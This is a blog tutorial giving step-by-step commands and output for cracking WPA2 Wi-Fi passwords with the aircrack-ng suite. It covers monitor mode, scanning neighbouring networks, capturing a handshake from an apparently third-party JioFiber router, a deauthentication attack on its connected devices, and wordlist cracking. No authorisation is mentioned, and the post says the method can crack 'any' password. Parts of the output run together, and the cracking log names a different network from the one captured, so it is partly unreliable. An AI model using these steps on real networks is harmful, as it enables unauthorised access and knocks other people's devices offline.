How to Hack Wi-Fi Password using Aircrack-ng
Hello everyone, This is my another blog in which we will discuss about how can we capture and crack wifi password using Aircrack-ng
We are using Aircrack-ng tool as this is open source and very versatile tool which is available for all operating systems.
Wireless Networks are widely used and it is quite easy to set them up. They use IEEE 802.11 standards. Wireless networks are accessible to anyone within the router’s transmission radius. This makes them vulnerable to attacks. Hotspots are available in public places such as Airports, Restaurants, Parks etc.
WEP and WPA are the two main security protocols used in Wi-Fi LAN. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of original 802.11 standards. But it was weak, and several serious weakness were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks.
Aircrack-NG
Aircrack is a software suite that helps you to attack and defend wireless networks. Aircrack is not a single tool, but a suite of tools, each of which performs a specific function. These tools include a detector, packet sniffer, WEP/WPA cracker, and so on.
Before we look at Aircrack in detail, here are a few terms you should know.
- Access Point — The WiFi network that you want to connect to.
- SSID — The name of the access point. eg. “Starbucks”
- BSSID — MAC Address of the wifi device.
- Pcap file — Packet capture file. Contains captured packets on a network.
- Monitor mode — Capturing the network packets in the air without connecting to a router or access point.
Before starting everything we need to ensure that our wifi adapter is in monitor mode. We can check its mode by the command:
$ iwconfig wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
If it’s not in monitor mode type the command :
$ airmon-ng start wlan0 PID Name
667 NetworkManager
1198 wpa_supplicantPHY Interface Driver Chipsetphy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
This will convert your wireless adapter mode to monitor mode. Once this is enabled, you should be able to capture network packets. After this we will move to process of capturing the packets through its next tool airodump-ng.
Airodump-ng is a packet capture utility that captures and saves raw data packets for further analysis. We will use airodump-ng with its different switches further for various uses. First we’ll monitor all available access points in our range.
$ airodump-ng --manufacturer wlan0monCH 4 ][ Elapsed: 30 s ][ 2021-02-27 15:47BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSI MANUFACTURER18:82:8C:EC:2C:20 -34 56 0 0 1 130 WPA2 CCMP PSK JioFiber-Kie6e Unknown
04:95:E6:74:34:30 -85 35 0 0 10 270 WPA2 CCMP PSK Tenda_743430 Tenda Technology Co.,Ltd.Dongguan branch
00:24:82:A6:5F:78 -83 2 0 0 2 54e. WPA2 CCMP PSK <length: 0> Ruckus Wireless
28:3B:82:65:9C:0B -89 7 0 0 8 270 WPA2 CCMP PSK Darkunde D-Link International
AC:37:28:61:A4:89 -93 19 1 0 9 130 WPA2 CCMP PSK Home 95 Unknown
50:2B:73:1D:B8:50 -93 15 0 0 3 270 WPA2 CCMP PSK Sahuji Tenda Technology Co.,Ltd.Dongguan branch
Choose one of the access point which you wish to connect. Let’s take Jio-Fiber to connect. For this we need to capture the packets of Jio-Fiber access point along with its WPA Handshake.
$ airodump-ng --channel 1 --bssid 18:82:8C:EC:2C:20 --write packets wlan0monIn this command, — write switch is used to write/save the capture packets into a file named packets after which we defined our device name.
One a device connects to this access point we’ll get our WPA Handshake. Or if you fails to get WPA Handshake and you can see some of devices connected to that access point. You can apply an de-authentication attack which will force those devices to disconnect and connect to that access point. In this way, we can get our WPA Handshake. For this we will use our next part of the tool which is aireplay-ng.
$ aireplay-ng --deauth 0 -a 18:82:8C:EC:2C:20 wlan0monAfter some time stop this command and we will recieve our WPA Handshake on another hand.
After receiving WPA Handshake we will crack the password out of it using next part of the tool which is aircrack-ng.
For the password cracking by aircrack-ng we will need a wordlist to match the password, we can use deafult wordlist pre-installed in kali-linux i.e. rockyou.txt.
$ aircrack-ng packets-01.cap -w /usr/share/wordlists/rockyou.txt Reading packets, please wait...
Opening packets-01.cap
Read 2418 packets.# BSSID ESSID Encryption1 DE:1A:C5:E6:56:B7 vivo 1609 WPA (1 handshake)Choosing first network as target.Reading packets, please wait...
Opening packets-01.cap
Read 2418 packets.1 potential targetsAircrack-ng 1.6[00:00:01] 105/10303732 keys tested (176.21 k/s)Time left: 16 hours, 14 minutes, 33 seconds 0.00%KEY FOUND! [ 123456789 ]Master Key : F0 CA 88 D0 38 B4 D0 64 2F C4 35 DB 5D CD 5A 6D
93 0B 07 29 13 57 0D 77 B7 B4 CF 3A AD 30 AA FFTransient Key : D8 05 40 9F 07 64 5C C1 26 F2 2B A9 3E BB DD 71
9E B5 88 74 6A 41 7F AA 0A AE 76 1A 66 7F 53 15
13 44 AC 09 A3 0F 0D EA 37 CC 10 A2 9F 94 05 21
BD 71 98 F3 4F BF 69 29 EB 33 F6 CD 11 C8 AA 50EAPOL HMAC : 92 34 96 78 2E 0C 44 9B 49 B9 CA 44 7E 8F 99 C0
So here is the cracked password key and voila we found the password. In this way you can crack any wifi password key using this method but make sure the key should match the word in your wordlist or you will need another wordlist or custom wordlist.
Wait….. Before leaving and connecting to the pwned access point don’t forget to switch back your wireless adapter from monitor mode to managed mode.
$ airmon-ng stop wlan0mon
I will recommend using rockyou.txt wordlist or any custom wordlist but if you want to use another complex wordlist here is the link which you can use:
You can also use some other software which are automated and used for password cracking which are WEPCrack, Wifite, Fern Wifi Cracker, MDK3 etc. But I recommend using this manual method which will be easy and understandable where you can do everything at your own hand.
For any queries contact on my twitter and linkedin profiles -
